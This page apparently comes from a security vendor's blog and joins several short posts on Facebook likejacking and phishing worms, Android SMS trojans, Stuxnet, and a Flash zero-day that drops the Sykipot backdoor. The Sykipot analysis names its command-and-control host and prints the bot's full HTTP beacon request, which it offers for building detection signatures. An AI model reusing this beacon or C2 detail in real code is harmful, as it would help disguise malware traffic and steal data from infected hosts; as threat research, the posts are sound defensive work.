24 Apr Changing characters: something exotic in place of regular Latin script Maria Rubinstein
24 Apr CeCOS VIII - Hong Kong Michael
23 Apr Easter bunnies for all occasions Tatiana Kulikova
23 Apr An SMS Trojan with global ambitions Roman Unuchek
17 Apr New threat: Trojan-SMS.AndroidOS.Stealer.a Victor Chebyshev
16 Apr Would you like some Zeus with your coffee? Maria Vergelis
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
Another Facebook likejacking attempt is being spammed out to fool Facebook users with "5 things girls do before she meets her boyfriend". Instead of presenting a video, the page redirects browsers to a "Like" button hosted on Facebook.
As illustrated above, tens of thousands of people have clicked on the link while they are logged into Facebook already. If you are one of the people who have already attempted to watch the video, please remove the "like" entry from your wall or newsfeed. Also, delete the liked page from your "Likes and Interests" section.
Even more interesting information falls out when you investigate a bit deeper. Attempting to access the "HTML source" results in an offer suggesting that you sell your fan pages to a suspicious email address, which is not recommended.
Yesterday, Adobe published an advisory about a critical vulnerability in their Flash Player that is already being actively exploited. The CVE number assigned to this bug is CVE-2010-3654. A fix is currently being prepared by Adobe. The exploit we are seeing right now has a payload which, while not being very sophisticated, holds several surprises.
When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built in unistall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.
The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.
The injected code will send an HTTP request to news.mysundayparty.com every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. Here is a decoded config file:
Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.
A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the prefix '-nsunday' and is quite unique. Also note the Referer field, which is always set to http://www.yahoo.com/, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.
GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-192.168.0.1-nsunday HTTP/1.1 Referer: http://www.yahoo.com/ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:22.214.171.124) Gecko/2009021910 Firefox/3.0.7 Host: news.mysundayparty.com Cache-Control: no-cache
Kaspersky detects both the installer and the DLL as Backdoor.Win32.Sykipot.an. The exploit is heuristically detected as Exploit.Script.Generic.
A zero day exploit attacking this vulnerability was used at the compromised Nobel Peace Prize website to drop a trojan on unsuspecting visitors' systems, although the 0day was limited in that it did not implement well known ROP or JOP techniques (link to zipped pdf of VB2010 presentation slides) to effectively attack defensive technologies on newer Windows Vista and 7 platforms like DEP and ASLR. It effectively attacked newer FF on older versions of Windows.
In this latest installment of the Lab Matters webcast, senior malware analyst Denis Maslennikov provides an inside look at the mobile threat landscape.
Maslennikov discusses the recent surge in SMS trojans targeting the Android platform, the use of search engine optimization techniques to spread mobile malware and the financial incentives involved.
He also talks about how attacks differ between mobile platforms and offer some startling predictions about what we'll see in the coming years.
Just another Sunday evening – I get to Moscow, check in and naturally go online to Facebook to inform everyone about how my trip went. Not very exciting, right? Wrong. A friend had ‘sent’ me a strange-looking link via Facebook IM. A closer look revealed that it was a link being spread by a new and active Facebook worm. The worm was stealing login credentials – and had already successfully stolen the credentials from thousands of people.
The worm spreads through Facebook instant messenger – just like many other Facebook worms. The message states the following: "Is this you?" followed by a link to the malicious Facebook app. The Facebook application is pretty simple; it loads new content into an iframe. The page which is loaded within the iframe is a simple phishing site: it asks for your Facebook credentials so that you can see some new content. Below is a screenshot of the login page:
I decided to investigate the phishing site a bit more, so I checked for some common directories on the server; directories which could contain more information about the worm and I found a directory which contained the Apache access logs. When analyzing the content of the log file I saw that someone was trying to access a file named acc.txt. I downloaded acc.txt and saw that the file contained stolen accounts: in the first version of acc.txt which I downloaded I saw that the attacker had collected over 3000 accounts! I downloaded the acc.txt at 5-minute intervals, and within 20 minutes, the number of stolen accounts went from 3000 to over 6000.
I immediately contacted the Facebook security team – who responded equally rapidly. The malicious page is down, and the Facebook team is going through their remediation routine.
This phishing attack was very simple and yet thousands of people fell for it!!! My guess is that there are lots of other similar attacks happening as I write this.
So... when you are logged on to Facebook, do NOT trust anything which is sent to you, especially not when it asks for your password or credit card information.
We have just detected a third FakePlayer SMS Trojan for Android phones – it’s been a month since we saw the second one. What’s new in this one?
First of all, the ‘porno player’ icon from the first variant has returned.
In the second place, this variant sends for-fee SMS/text messages to two short numbers now – 7132 as in the previous version and also 4161 - new for this version.
The cost for every SMS/text message remains 6 USD (about 170 Russian rubles).
There are no other changes. The same archive – pornplayer.apk, the same infection vector – via the Internet using SEO tricks and the same queries upon installation:
So no real changes – just a new variant to earn additional money… But the trend for regular updates is a concern.
PS Everyone with a phone which supports J2ME should also beware: if you go to a website which is spreading Trojan-SMS.AndroidOS.FakePlayer.c using a mobile web browser, such as Opera Mini for instance, you will be offered a link to download a J2ME application – which happens to be a Trojan we detect as Trojan.SMS.J2ME.Small.r.
In this latest edition of our Lab Matters webcast, senior anti virus resercher Roel Schouwenberg discusses the intricacies of the mysterious Stuxnet worm attack.
In this Q&A with security evangelist Ryan Naraine, Schouwenberg provides valuable insight into Stuxnet's exploitation and propagation techniques, the use of multiple zero-day vulnerabilities, the security posture of ICS and SCADA systems and the possibility that this attack was financed and backed by a nation-state.
It was a special event for Kaspersky Lab since we had a record-breaking total of seven speakers: who covered the most interesting and hot topics such as mobile malware, on-line fraud and black markets, targeted attacks. Last, but not least, we were able to reveal some new details about Stuxnet in a joint presentation with Microsoft. The VB conference demonstrated again how important cooperation between researchers is. Between the joint work on Stuxnet and the Zeus-related arrests we saw how AV researchers from different countries; cultures and companies join forces to fight cyber crime and to make this world safer.